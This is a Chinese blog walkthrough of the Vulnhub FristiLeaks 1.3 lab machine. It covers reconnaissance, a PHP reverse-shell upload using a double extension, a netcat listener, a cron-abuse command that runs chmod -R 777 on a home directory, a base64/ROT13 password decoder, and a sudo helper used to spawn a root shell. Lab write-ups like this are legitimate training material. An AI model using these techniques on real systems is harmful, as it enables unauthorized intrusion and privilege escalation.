<!DOCTYPE html>
<html lang="zh-cn">
<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <title>Vulnhub 靶机渗透之 FristLeaks_1.3 - 泡枸杞的咸鱼</title>
  <meta name="renderer" content="webkit" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>

<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />

<meta name="theme-color" content="#f8f5ec" />
<meta name="msapplication-navbutton-color" content="#f8f5ec">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#f8f5ec">


<meta name="author" content="dds2333" /><meta name="description" content="继续撸靶机 在不看 writeup 情况下，搞到一半，无法提权，还是老老实实看 writeup 才 Get flag. XD 靶机 https://www.vulnhub.com/entry/fristileaks-13,133/ 前期准备 运行环境：VM Workstation，VM Esxi，Vi" /><meta name="keywords" content="Hugo, theme, even" />






<meta name="generator" content="Hugo 0.72.0 with theme even" />


<link rel="canonical" href="https://dds2333.github.io/post/2020/04/15/vulnhub_fristileaks1.3/" />
<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/manifest.json">
<link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5">



<link href="/sass/main.min.4eb71590ad024de2ebb1b5eef94cbb645b7e63e6b9c4c837355530a75e112ce1.css" rel="stylesheet">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.1.20/dist/jquery.fancybox.min.css" integrity="sha256-7TyXnr2YU040zfSP+rEcz29ggW4j56/ujTPwjMzyqFY=" crossorigin="anonymous">


<meta property="og:title" content="Vulnhub 靶机渗透之 FristLeaks_1.3" />
<meta property="og:description" content="继续撸靶机 在不看 writeup 情况下，搞到一半，无法提权，还是老老实实看 writeup 才 Get flag. XD 靶机 https://www.vulnhub.com/entry/fristileaks-13,133/ 前期准备 运行环境：VM Workstation，VM Esxi，Vi" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://dds2333.github.io/post/2020/04/15/vulnhub_fristileaks1.3/" />
<meta property="article:published_time" content="2020-04-15T23:06:31+08:00" />
<meta property="article:modified_time" content="2020-04-15T23:06:31+08:00" />
<meta itemprop="name" content="Vulnhub 靶机渗透之 FristLeaks_1.3">
<meta itemprop="description" content="继续撸靶机 在不看 writeup 情况下，搞到一半，无法提权，还是老老实实看 writeup 才 Get flag. XD 靶机 https://www.vulnhub.com/entry/fristileaks-13,133/ 前期准备 运行环境：VM Workstation，VM Esxi，Vi">
<meta itemprop="datePublished" content="2020-04-15T23:06:31&#43;08:00" />
<meta itemprop="dateModified" content="2020-04-15T23:06:31&#43;08:00" />
<meta itemprop="wordCount" content="888">



<meta itemprop="keywords" content="Vulnhub,渗透测试," /><meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Vulnhub 靶机渗透之 FristLeaks_1.3"/>
<meta name="twitter:description" content="继续撸靶机 在不看 writeup 情况下，搞到一半，无法提权，还是老老实实看 writeup 才 Get flag. XD 靶机 https://www.vulnhub.com/entry/fristileaks-13,133/ 前期准备 运行环境：VM Workstation，VM Esxi，Vi"/>

<!--[if lte IE 9]>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/classlist/1.1.20170427/classList.min.js"></script>
<![endif]-->

<!--[if lt IE 9]>
  <script src="https://cdn.jsdelivr.net/npm/html5shiv@3.7.3/dist/html5shiv.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/respond.js@1.4.2/dest/respond.min.js"></script>
<![endif]-->

</head>
<body>
  <div id="mobile-navbar" class="mobile-navbar">
  <div class="mobile-header-logo">
    <a href="/" class="logo">泡枸杞的咸鱼</a>
  </div>
  <div class="mobile-navbar-icon">
    <span></span>
    <span></span>
    <span></span>
  </div>
</div>
<nav id="mobile-menu" class="mobile-menu slideout-menu">
  <ul class="mobile-menu-list">
    <a href="/">
        <li class="mobile-menu-item">主页</li>
      </a><a href="/post/">
        <li class="mobile-menu-item">归档</li>
      </a><a href="/tags/">
        <li class="mobile-menu-item">标签</li>
      </a><a href="/categories/">
        <li class="mobile-menu-item">分类</li>
      </a><a href="/about/">
        <li class="mobile-menu-item">关于</li>
      </a>
  </ul>
</nav>
  <div class="container" id="mobile-panel">
    <header id="header" class="header">
        <div class="logo-wrapper">
  <a href="/" class="logo">泡枸杞的咸鱼</a>
</div>

<nav class="site-navbar">
  <ul id="menu" class="menu">
    <li class="menu-item">
        <a class="menu-item-link" href="/">主页</a>
      </li><li class="menu-item">
        <a class="menu-item-link" href="/post/">归档</a>
      </li><li class="menu-item">
        <a class="menu-item-link" href="/tags/">标签</a>
      </li><li class="menu-item">
        <a class="menu-item-link" href="/categories/">分类</a>
      </li><li class="menu-item">
        <a class="menu-item-link" href="/about/">关于</a>
      </li>
  </ul>
</nav>
    </header>

    <main id="main" class="main">
      <div class="content-wrapper">
        <div id="content" class="content">
          <article class="post">
    
    <header class="post-header">
      <h1 class="post-title">Vulnhub 靶机渗透之 FristLeaks_1.3</h1>

      <div class="post-meta">
        <span class="post-time"> 2020-04-15 </span>
        <div class="post-category">
            <a href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"> 渗透测试 </a>
            </div>
          <span class="more-meta"> 约 888 字 </span>
          <span class="more-meta"> 预计阅读 2 分钟 </span>
        
      </div>
    </header>

    <div class="post-toc" id="post-toc">
  <h2 class="post-toc-title">文章目录</h2>
  <div class="post-toc-content always-active">
    <nav id="TableOfContents">
<ul>
<li><a href="#靶机">靶机</a></li>
<li><a href="#前期准备">前期准备</a></li>
<li><a href="#目标">目标</a></li>
<li><a href="#主机信息">主机信息</a></li>
<li><a href="#服务发现">服务发现</a></li>
<li><a href="#目录探测">目录探测</a></li>
<li><a href="#探测-web-服务">探测 Web 服务</a></li>
<li><a href="#getshell">GetShell</a></li>
<li><a href="#提权">提权</a></li>
</ul>
</nav>
  </div>
</div>
    <div class="post-content">
      

<p>继续撸靶机</p>

<p>在不看 writeup 情况下，搞到一半，无法提权，还是老老实实看 writeup 才 Get flag. XD</p>

<p><img src="/img/2020/04/15/留下了没技术的泪水.jpg" alt="XD" /></p>

<h1 id="靶机">靶机</h1>

<p><a href="https://www.vulnhub.com/entry/fristileaks-13,133/">https://www.vulnhub.com/entry/fristileaks-13,133/</a></p>

<h1 id="前期准备">前期准备</h1>

<p>运行环境：VM Workstation，VM Esxi，VirtualBox</p>

<p>将下载的 ova 文件直接导入虚拟机</p>

<h1 id="目标">目标</h1>

<p>获取 root 权限并且读取 flag</p>

<h1 id="主机信息">主机信息</h1>

<p>在 VM Workstation 中打开导入的虚拟机，系统启动后可看到当前虚拟机 IP （需要更改靶机 MAC 地址为 08:00:27:A5:A6:76 ,靶机作者有说明）</p>

<p><img src="/img/2020/04/15/Login.png" alt="靶机信息" /></p>

<p>当前靶机IP为192.168.32.128</p>

<h1 id="服务发现">服务发现</h1>

<p>使用 Nmap 对靶机进行扫描</p>

<p><img src="/img/2020/04/15/nmap.png" alt="nmap扫描" /></p>

<p>可以看到目标开启了80端口并且是 PHP，访问之：</p>

<p><img src="/img/2020/04/15/192.168.32.128_web.png" alt="web" /></p>

<h1 id="目录探测">目录探测</h1>

<p>使用 dirsearch 扫描 web 目录：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-fallback" data-lang="fallback">python3 dirsearch.py -u http://192.168.32.128/ -e php,html,js,json,.txt</code></pre></td></tr></table>
</div>
</div>
<p><img src="/img/2020/04/15/dirsearch.png" alt="目录扫描" /></p>

<p>依次访问并没有发现什么特别的东东，这里卡了很久o_o &hellip;.</p>

<p>结合首页的信息 KEEP CALM AND DRINK FRISTI 以及看了下其他人写的 writeup，确定 fristi/ 路径可用</p>

<h1 id="探测-web-服务">探测 Web 服务</h1>

<p>访问 <a href="http://192.168.32.128/fristi/">http://192.168.32.128/fristi/</a></p>

<p><img src="/img/2020/04/15/fristi.png" alt="fristi" /></p>

<p>从 F12 很明显看到 head 标签的信息以及一串 Base64 编码，于是解码看看：</p>

<p><img src="/img/2020/04/15/decode_png.png" alt="base64decode" /></p>

<p>很明显是一张 PNG 图片，保存下来打开：</p>

<p><img src="/img/2020/04/15/download.png" alt="pass" /></p>

<p>猜测可能是登录口令，尝试使用用户名 eezeepz 和口令 keKkeKKeKKeKkEkkEk 登录：</p>

<p><img src="/img/2020/04/15/login_fristi.png" alt="login_fristi" /></p>

<h1 id="getshell">GetShell</h1>

<p>到这里大概知道可以利用文件上传 getshell，于是上传一个php reverse shell 试试：</p>

<p><img src="/img/2020/04/15/upload_type.png" alt="upload" /></p>

<p>看来前端限制只能上传 png,jpg,gif 格式，而使用 Burpsuite 修改后缀则成功上传（利用 Apache 2.x 多后缀解析漏洞）</p>

<p><img src="/img/2020/04/15/burp_shell.png" alt="burp_upload" /></p>

<p><img src="/img/2020/04/15/upload.png" alt="uploadpath" /></p>

<p>kali 先 netcat 反弹：nc -lvp 4444,接着访问上传的 reverse shell :<a href="http://192.168.32.128/fristi/uploads/php_reverse_shell.php.jpg">http://192.168.32.128/fristi/uploads/php_reverse_shell.php.jpg</a></p>

<p><img src="/img/2020/04/15/getshell.png" alt="getshell" /></p>

<p>得到反弹 shell 后，使用 python pty 获取交互式 shell(最实用之一)：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-fallback" data-lang="fallback">python -c &#39;import pty;pty.spawn(&#34;/bin/bash&#34;)&#39;</code></pre></td></tr></table>
</div>
</div>
<p><img src="/img/2020/04/15/tty_shell.png" alt="tty_shell" /></p>

<h1 id="提权">提权</h1>

<p>一顿乱翻后，发现 notes.txt，查看之：</p>

<p><img src="/img/2020/04/15/notes.png" alt="notes" /></p>

<p>大概意思是需要在 /tmp 下创建一个 &ldquo;runthis&rdquo; 文件（touch /tmp/runthis），接着赋予执行权限：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-fallback" data-lang="fallback">echo &#34;/usr/bin/whoami &amp;&amp; chmod -R 777 /home/admin&#34; &gt; /tmp/runthis</code></pre></td></tr></table>
</div>
</div>
<p>跳转至 /home/admin/ 目录并 ls 查看：</p>

<p><img src="/img/2020/04/15/home_admin.png" alt="home_admin" /></p>

<p>重点关注 cryptpass.py，cryptedpass.txt，whoisyourgodnow.txt：</p>

<p>cryptpass.py：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span><span class="lnt">7
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-fallback" data-lang="fallback">#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys
def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], &#39;rot13&#39;)
cryptoResult=encodeString(sys.argv[1])
print cryptoResult</code></pre></td></tr></table>
</div>
</div>
<p>cryptedpass.txt</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-fallback" data-lang="fallback">mVGZ3O3omkJLmy2pcuTq</code></pre></td></tr></table>
</div>
</div>
<p>whoisyourgodnow.txt</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-fallback" data-lang="fallback">=RFn0AKnlMHMPIzpyuTI0ITG</code></pre></td></tr></table>
</div>
</div>
<p>在 cryptpass.py 中不难发现其使用了 Base64 编码和 ROT13 加密，因此使用脚本进行解密 cryptedpass.txt 和 whoisyourgodnow.txt：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-fallback" data-lang="fallback">import base64,codecs,sys
def decodeString(str):
    base64string = codecs.decode(str, &#39;rot13&#39;)
    return base64.b64decode(base64string[::-1])
decryptedResult=decodeString(sys.argv[1])
print decryptedResult</code></pre></td></tr></table>
</div>
</div>
<p><img src="/img/2020/04/15/plain.png" alt="decrypt" /></p>

<p>解密得到的明文分别是 admin、fristigod 的口令，切换到fristigod 用户：</p>

<p><img src="/img/2020/04/15/fristigod.png" alt="fristigod" /></p>

<p>又是一通乱翻：</p>

<p><img src="/img/2020/04/15/bash_history.png" alt="bash_history" /></p>

<p>从历史记录中可以看到 fristigod 在使用 sudo 来执行命令，直接用一条历史记录中的命令创建 shell:</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre class="chroma"><code class="language-fallback" data-lang="fallback">sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash</code></pre></td></tr></table>
</div>
</div>
<p><img src="/img/2020/04/15/root.png" alt="root" /></p>

<p>显然已经获取到 root 权限，最后获取 flag：</p>

<p><img src="/img/2020/04/15/flag.png" alt="flag" /></p>

    </div>

    <div class="post-copyright">
  <p class="copyright-item">
    <span class="item-title">文章作者</span>
    <span class="item-content">dds2333</span>
  </p>
  <p class="copyright-item">
    <span class="item-title">上次更新</span>
    <span class="item-content">
        2020-04-15
        
    </span>
  </p>
  
  
</div>
<footer class="post-footer">
      <div class="post-tags">
          <a href="/tags/vulnhub/">Vulnhub</a>
          <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a>
          </div>
      <nav class="post-nav">
        <a class="prev" href="/post/2020/04/18/vs2019_caikeng/">
            <i class="iconfont icon-left"></i>
            <span class="prev-text nav-default">vs2019 C# dll打包 exe 踩坑</span>
            <span class="prev-text nav-mobile">上一篇</span>
          </a>
        <a class="next" href="/post/2020/03/07/ptest_things/">
            <span class="next-text nav-default">渗透资料收集</span>
            <span class="next-text nav-mobile">下一篇</span>
            <i class="iconfont icon-right"></i>
          </a>
      </nav>
    </footer>
  </article>
        </div>
        

  

  

      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="social-links">
      <a href="mailto:dds2014@live.cn" class="iconfont icon-email" title="email"></a>
      <a href="https://github.com/dds2333" class="iconfont icon-github" title="github"></a>
  <a href="https://dds2333.github.io/index.xml" type="application/rss+xml" class="iconfont icon-rss" title="rss"></a>
</div>

<div class="copyright">
  <span class="power-by">
    由 <a class="hexo-link" href="https://gohugo.io">Hugo</a> 强力驱动
  </span>
  <span class="division">|</span>
  <span class="theme-info">
    主题 - 
    <a class="theme-link" href="https://github.com/olOwOlo/hugo-theme-even">Even</a>
  </span>

  

  <span class="copyright-year">
    &copy; 
    2019 - 
    2021
    <span class="heart">
      <i class="iconfont icon-heart"></i>
    </span>
    <span class="author">dds2333</span>
  </span>
</div>
    </footer>

    <div class="back-to-top" id="back-to-top">
      <i class="iconfont icon-up"></i>
    </div>
  </div>
  
  <script src="https://cdn.jsdelivr.net/npm/jquery@3.2.1/dist/jquery.min.js" integrity="sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4=" crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/slideout@1.0.1/dist/slideout.min.js" integrity="sha256-t+zJ/g8/KXIJMjSVQdnibt4dlaDxc9zXr/9oNPeWqdg=" crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.1.20/dist/jquery.fancybox.min.js" integrity="sha256-XVLffZaxoWfGUEbdzuLi7pwaUJv1cecsQJQqGLe7axY=" crossorigin="anonymous"></script>



<script type="text/javascript" src="/js/main.min.d7b7ada643c9c1a983026e177f141f7363b4640d619caf01d8831a6718cd44ea.js"></script>
  <script type="text/javascript">
    window.MathJax = {
      tex2jax: {inlineMath: [['$','$'], ['\\(','\\)']]},
      TeX: {equationNumbers: {autoNumber: "AMS"}},
      showProcessingMessages: false,
      messageStyle: 'none'
    };
  </script>
  <script async src="https://cdn.jsdelivr.net/npm/mathjax@2.7.5/MathJax.js?config=TeX-MML-AM_CHTML"  integrity="sha256-nvJJv9wWKEm88qvoQl9ekL2J+k/RWIsaSScxxlsrv8k=" crossorigin="anonymous"></script>








</body>
</html>
